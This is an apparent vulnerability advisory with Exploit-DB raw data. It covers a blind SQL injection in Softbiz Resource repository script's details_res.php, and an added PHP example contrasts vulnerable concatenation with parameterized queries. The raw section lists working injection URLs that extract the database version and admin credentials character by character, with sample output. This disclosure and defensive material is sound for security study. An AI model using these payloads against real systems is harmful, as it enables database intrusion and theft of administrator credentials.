Vendor: Softbiz Resource repository script
By: Sangteamtham
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: Softbiz Resource repository script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Softbiz Resource repository script Blind SQL Vulnerability (Normal version)

Softbiz Resource repository script is vulnerable to blind SQL injection through the sbres_id parameter of /resource/details_res.php. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. Conditions built with the substring() function reveal the database version, and the same function can be used to extract the username and password of the admin. Combined with the concat() function, it can also extract the username and password from the admin_info_table.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
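
The mitigation above, sketched for the sbres_id parameter of details_res.php as an added example (not Softbiz code and not part of the original advisory). The resources table, its columns and the function names are hypothetical, and an in-memory SQLite database stands in for the application's MySQL backend so the script runs offline.

```php
<?php
// Added example, not Softbiz code. Table/column names (resources, id, title)
// are hypothetical; SQLite in memory stands in for the MySQL backend.
declare(strict_types=1);

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE resources (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO resources (id, title) VALUES (121, 'Constructed sample row')");
    return $pdo;
}

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so anything after the number is parsed as part of the WHERE clause.
function find_resource_unsafe(PDO $pdo, string $sbresId): ?array
{
    $sql = 'SELECT id, title FROM resources WHERE id = ' . $sbresId;
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened pattern: strict integer validation, then a bound parameter.
function find_resource_safe(PDO $pdo, string $sbresId): ?array
{
    $id = filter_var($sbresId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject anything that is not a positive integer
    }
    $stmt = $pdo->prepare('SELECT id, title FROM resources WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

$pdo = open_demo_db();
// Constructed inputs: a normal id, then a true/false condition pair appended to it.
foreach (['121', '121 and 1=1', '121 and 1=2'] as $input) {
    printf("%-12s unsafe=%s safe=%s\n", $input,
        find_resource_unsafe($pdo, $input) ? 'row' : 'none',
        find_resource_safe($pdo, $input) ? 'row' : 'none');
}
```

In the unsafe function the two conditioned inputs produce different results, which is the response difference a blind injection depends on; the hardened function returns the same result for both.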

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$  Softbiz Resource repository script Blind SQL Vulnerability  (Normal version)            
$  Author : Sangteamtham                                                                    
$  Home  : Hcegroup.net & vnbrain.net                                                 
$  Download :http://www.softbizscripts.com/FAQ-script-features.php   
$                   					           
$******************************************************************************************
$
$ check version : /resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=4 
$                        /resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=5
$                        /resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/*  
$                       /resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/*
$  note: password_column,username_column,admin_info_table depend on the database installed
$***********************************************************
$ Demo: 
$ In the demo site : 
$ 
$ Exploit: 
$ http://server/resource/details_res.php?sbres_id=121%20and%20substring(@@version,1,1)=5
$ MySQL version: 5.0.81-community
$ User: softbiz_kuber@localhost
$ Database: softbiz_resource